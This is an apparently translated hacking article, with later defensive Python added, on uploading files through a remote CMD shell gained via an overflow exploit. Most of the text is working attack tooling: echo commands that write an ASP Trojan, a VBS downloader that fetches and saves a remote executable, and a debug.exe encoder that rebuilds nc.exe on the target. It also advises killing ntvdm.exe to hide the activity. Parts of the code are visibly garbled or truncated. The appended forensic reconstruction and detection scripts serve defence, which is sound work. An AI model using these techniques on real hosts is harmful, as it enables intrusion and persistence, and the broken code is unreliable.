File Transfer
The biggest problem with a CMD shell obtained through an overflow vulnerability is how to upload files. Because of the prevalence of worms, ports 139 and 445, which are needed to connect to IPC$, are blocked by routers. In addition, Windows XP hardens IPC$, so uploading through IPC$ or the default shares is basically ineffective. FTP and TFTP are two feasible methods; they are well known and are not described in this article. Three other methods that you may be familiar with are summarized below:
1. Use the echo command to write an ASP Trojan.
This requires that IIS is installed on the target host.
Typical ASP Trojans are large and not suited to being written directly with the echo command, so here is a small one.
The echo version is given directly:
@echo ^>up.asp
Note that this is a single line with no line break in the middle.
The generated up.asp cannot be used from a browser; you can only use the following script:
with wscript
if .arguments.count>DL.vbs
@echo W.open "get",.arguments(0),0:W.send:if W.status^>200 then .echo "error:"+W.status:.quit>>DL.vbs
@echo ASO.type=1:ASO.open:ASO.write W.responsebody:ASO.savetofile .arguments(1),2:end with>>DL.vbs
Example: download ps.exe and save it to c:\path:
cscript DL.vbs http://www.sometips.com/soft/ps.exe c:\path\ps.exe
Note that this is executed in the remote shell.
4. Use a script plus debug.exe to restore an arbitrary file encoded with echo.
None of the preceding methods can get through a firewall. In addition, unless you run your own web server, tools found on the web are generally provided as compressed archives; if the target host has no decompression tool, you are stuck again. That leaves only the "killer" method!
With suitable escaping, the echo command can write any character whose ASCII code is below 128, but not characters at or above 128. So a local file can be written to the remote host only after it is re-encoded into printable characters. The first thing that comes to mind is base64, the encoding used for email attachments. However, VBS has no bitwise operators, so encoding and decoding are complicated. What is worse, scripts handle files as binary streams poorly. (ADODB.Stream can write files in binary mode, but I could not construct the corresponding data type. A binary stream can be converted to a string with the midb function, but not the other way around. I spent two days on this without solving it. If anyone can write arbitrary byte data to a file with VBS or JS, please let me know.)
No matter. All you need is debug.exe. Many people know the principle, so I will not explain it and instead give the encoding script directly:
fp = wscript.arguments(0)
fn = right(fp, len(fp) - instrrev(fp, "\"))
with createobject("adodb.stream")
  .type = 1: .open: .loadfromfile fp: str = .read: sl = lenb(str)
end with
sll = sl mod 65536: slh = sl \ 65536
with createobject("scripting.filesystemobject").opentextfile(fp & ".bat", 2, true)
  .write "@echo str="""
  for i = 1 to sl
    bt = ascb(midb(str, i, 1))
    if bt>debug.vbs" + vbcrlf + "@echo +"
  next
  .writeline """>>debug.vbs" + vbcrlf + "@echo with wscript.stdout:r=vbcrlf" _
    + ":for i=1 to len(str) step 48:.write ""E""+hex(256+(i-1)/2)" _
    + ":for j=i to i+46 step 2:.write "" ""+mid(str,j,2):next:.write r:next>>debug.vbs"
  .writeline "@echo .write ""rbx""+r+""" + hex(slh) + """+r+""rcx""+r+""" + hex(sll) _
    + """+r+""n debug.tmp""+r+""w""+r+""q""+r:end with" _
    + ">>debug.vbs&cscript //nologo debug.vbs|debug.exe>nul&ren debug.tmp """ & fn & """&del debug.vbs"
end with
Save it as echo.vbs. To upload nc.exe, run the following on the local command line:
cscript echo.vbs nc.exe
You can also drag the icon of the file to be transferred onto the icon of the script file.
A moment later, nc.exe.bat is generated in the current directory. Open it with Notepad or another editor and you will see content like the following (the hex data strings are abbreviated as ... here):
@echo str="..."_>debug.vbs
@echo +"..."_>>debug.vbs
@echo +"..."_>>debug.vbs
@echo +"..."_>>debug.vbs
............
............ (omitted rows)
............
@echo +"">>debug.vbs
@echo with wscript.stdout:r=vbcrlf:for i=1 to len(str) step 48:.write "E"+hex(256+(i-1)/2):for j=i to i+46 step 2:.write " "+mid(str,j,2):next:.write r:next>>debug.vbs
@echo .write "rbx"+r+"0"+r+"rcx"+r+"E800"+r+"n debug.tmp"+r+"w"+r+"q"+r:end with>>debug.vbs&cscript //nologo debug.vbs|debug.exe>nul&ren debug.tmp "nc.exe"&del debug.vbs
Select all, copy, switch to the remote command-line window and paste.
If the network is not slow, the whole upload takes about 20 seconds.
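As an added forensic example (not code from the original article), the following Python reconstructs the transferred file from a captured nc.exe.bat-style transcript using the format shown above: the hex chunks in the str= and + lines, the BX:CX byte count handed to debug.exe, and the final rename. The sample batch text is constructed and shrunk to a 6-byte payload.

```python
import re

# Constructed sample of the batch file the page's echo.vbs produces, shrunk to a
# 6-byte payload (an MZ header stub) so both the str= line and a + continuation
# line appear. Not the page's own output.
SAMPLE_BAT = r'''@echo str="4D5A9000"_>debug.vbs
@echo +"0300">>debug.vbs
@echo with wscript.stdout:r=vbcrlf:for i=1 to len(str) step 48:.write "E"+hex(256+(i-1)/2):for j=i to i+46 step 2:.write " "+mid(str,j,2):next:.write r:next>>debug.vbs
@echo .write "rbx"+r+"0"+r+"rcx"+r+"6"+r+"n debug.tmp"+r+"w"+r+"q"+r:end with>>debug.vbs&cscript //nologo debug.vbs|debug.exe>nul&ren debug.tmp "nc.exe"&del debug.vbs
'''

# One hex chunk per echo line; the first line opens str=, later lines append with +.
DATA_LINE = re.compile(r'^@echo (?:str=|\+)"([0-9a-f]*)"_?>{1,2}debug\.vbs$', re.I)
# The rbx/rcx values are the high and low 16 bits of the byte count debug.exe writes.
SIZE_REGS = re.compile(r'"rbx"\+r\+"([0-9a-f]+)"\+r\+"rcx"\+r\+"([0-9a-f]+)"', re.I)
# The rename at the end reveals the intended file name on the target.
RENAME = re.compile(r'ren debug\.tmp "([^"]+)"', re.I)


def reconstruct(bat_text):
    """Recover the transferred file from a captured echo/debug batch transcript.

    Returns the target name, the raw bytes, the size debug.exe was told to
    write (BX:CX) and whether that size matches the recovered data.
    """
    hex_chunks, name, bx, cx = [], None, None, None
    for line in bat_text.splitlines():
        m = DATA_LINE.match(line.strip())
        if m:
            hex_chunks.append(m.group(1))
            continue
        m = SIZE_REGS.search(line)
        if m:
            bx, cx = int(m.group(1), 16), int(m.group(2), 16)
        m = RENAME.search(line)
        if m:
            name = m.group(1)
    data = bytes.fromhex("".join(hex_chunks))
    declared = None if cx is None else (bx << 16) | cx
    return {"name": name, "data": data, "declared_size": declared,
            "size_ok": declared == len(data)}


if __name__ == "__main__":
    r = reconstruct(SAMPLE_BAT)
    print(r["name"], len(r["data"]), r["declared_size"], r["size_ok"])
```

A size mismatch between the rbx/rcx values and the recovered hex is the quickest sign that the transcript was truncated, which note 1 below says happens with larger files.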
Notes:
1. Transferring large files is unstable and may kill the shell; the smaller the file, the better the result. We recommend that the original file not exceed kb.
2. Before transferring a large file, first upload a small file as a "warm-up" so that the 16-bit virtual machine ntvdm.exe stays resident in the background. After all files have been uploaded, kill the NTVDM process for concealment.
3. Some cmd shells execute each command line with two extra carriage returns, so nc.exe.bat cannot be used directly.
4. The length of a single command is limited, so you cannot complete everything with one echo. Also, in the cmd shell provided by nc, an overly long command makes the shell exit on its own (an overflow?). You can change the 128 in the "i mod 128 = 0" statement to adjust the length of each echo command; the number of characters per echo is twice that value.
5. No script is needed for the decoding itself; the script is only used to reduce the amount of data transmitted (because it compresses the data). If I have time, I will write a better script with stronger compression and data validation.
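Note 2 points at what a defender can watch for: a script host and a debug.exe/ntvdm.exe instance started by the same cmd.exe within seconds of each other. This added Python (not from the original article) runs that correlation over constructed process-creation events; the event layout and the assumption that 16-bit debug.exe shows up as ntvdm.exe are mine.

```python
from collections import defaultdict

# Constructed process-creation events (not real telemetry), shaped as
# (timestamp_seconds, parent_pid, image, command_line). The 4242 entries mimic
# pasting nc.exe.bat into a remote cmd shell; the rest are benign noise.
SAMPLE_EVENTS = [
    (100, 4242, "cmd.exe", "cmd.exe"),
    (118, 4242, "cscript.exe", "cscript //nologo debug.vbs"),
    (118, 4242, "ntvdm.exe", "debug.exe"),
    (140, 4242, "cscript.exe", "cscript //nologo debug.vbs"),
    (140, 4242, "ntvdm.exe", "debug.exe"),
    (300, 5150, "cscript.exe", "cscript //nologo logon.vbs"),
    (900, 6060, "ntvdm.exe", "edit.com"),
]

SCRIPT_HOSTS = {"cscript.exe", "wscript.exe"}
# Assumption: on 32-bit Windows the 16-bit debug.exe runs inside ntvdm.exe,
# so either image name may be what the sensor records.
DEBUG_IMAGES = {"debug.exe", "ntvdm.exe"}


def find_echo_debug_transfers(events, window=5):
    """Flag script hosts whose parent also launched debug.exe/ntvdm.exe within
    `window` seconds: the cscript ... | debug.exe pipeline used above.
    Returns one (parent_pid, timestamp, script command line) tuple per hit."""
    by_parent = defaultdict(list)
    for ts, ppid, image, cmdline in events:
        by_parent[ppid].append((ts, image.lower(), cmdline))
    hits = []
    for ppid, procs in by_parent.items():
        debug_times = [ts for ts, img, cl in procs
                       if img in DEBUG_IMAGES or "debug.exe" in cl.lower()]
        for ts, img, cl in procs:
            if img in SCRIPT_HOSTS and any(abs(ts - d) <= window for d in debug_times):
                hits.append((ppid, ts, cl))
    return hits


if __name__ == "__main__":
    for hit in find_echo_debug_transfers(SAMPLE_EVENTS):
        print("possible echo/debug file transfer:", hit)
```

A lone ntvdm.exe (the edit.com event) or a lone cscript.exe is not flagged; only the paired chain under one parent is.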
Of course, everything is easy once you can upload files, but many tools are more convenient on Windows itself; when looking for the tools you need, do not forget what Windows already provides.